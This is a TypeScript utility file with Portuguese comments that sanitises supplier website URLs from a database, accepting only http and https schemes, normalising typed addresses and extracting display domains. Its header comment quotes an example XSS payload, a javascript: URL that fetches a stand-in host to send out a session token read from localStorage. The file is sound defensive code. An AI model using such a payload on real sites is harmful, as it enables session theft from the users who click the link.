// =============================================================================
// app/src/lib/link.ts — endereços vindos do banco que viram `href`.
//
// O site do fornecedor (migração 025) é digitado por gerente ou dono e clicado
// por gerente ou dono. Um `javascript:fetch('https://evil.tld/?k='+
// localStorage.getItem('serginho-auth'))` gravado ali executaria no domínio do
// sistema, com o token de sessão de quem clicou ao lado — é a mesma escalada
// que o escape do documento do "a ver" existe para impedir.
//
// O banco já tem um check de esquema (só http/https). Isto aqui é a segunda
// camada, do lado de cá: se um dia alguém escrever na tabela por outro caminho,
// a tela ainda recusa. Duas travas para a mesma coisa é de propósito — a tela é
// conveniência, o Postgres é autorização, e nenhuma das duas confia na outra.
// =============================================================================

/**
 * Devolve a URL só se ela for navegável com segurança; `null` caso contrário.
 *
 * `new URL` é o analisador do próprio navegador — mais confiável que qualquer
 * expressão regular de URL, que é folclore e erra para os dois lados. O que se
 * decide aqui é só o ESQUEMA, que é onde mora o perigo.
 */
export function urlSegura(bruta: string | null | undefined): string | null {
  if (!bruta) return null;
  const texto = bruta.trim();
  if (texto === '') return null;
  try {
    const u = new URL(texto);
    return u.protocol === 'http:' || u.protocol === 'https:' ? u.toString() : null;
  } catch {
    return null;
  }
}

/**
 * Prepara o que a pessoa digitou para gravar: ninguém escreve "https://" ao
 * copiar o endereço de um fornecedor do caderno, e recusar "mga.com.br" por
 * isso seria implicância. Vazio continua vazio (o campo é opcional).
 *
 * Devolve `null` quando não dá para salvar de jeito nenhum — aí a tela avisa,
 * em vez de mandar ao banco algo que o check vai recusar com erro em inglês.
 */
export function normalizarSite(bruta: string): string | null | undefined {
  const texto = bruta.trim();
  if (texto === '') return null;
  const comEsquema = /^[a-z][a-z0-9+.-]*:/i.test(texto) ? texto : `https://${texto}`;
  // `undefined` = não deu: quem chama transforma em recado ao usuário.
  return urlSegura(comEsquema) ?? undefined;
}

/**
 * Como o endereço aparece na tela. "https://www.mga.com.br/" ocupa a largura de
 * um cartão para dizer "mga.com.br" — e num chip pequeno o que cabe é o
 * domínio.
 */
export function dominioDe(url: string): string {
  const seguro = urlSegura(url);
  if (!seguro) return url;
  return new URL(seguro).hostname.replace(/^www\./, '');
}
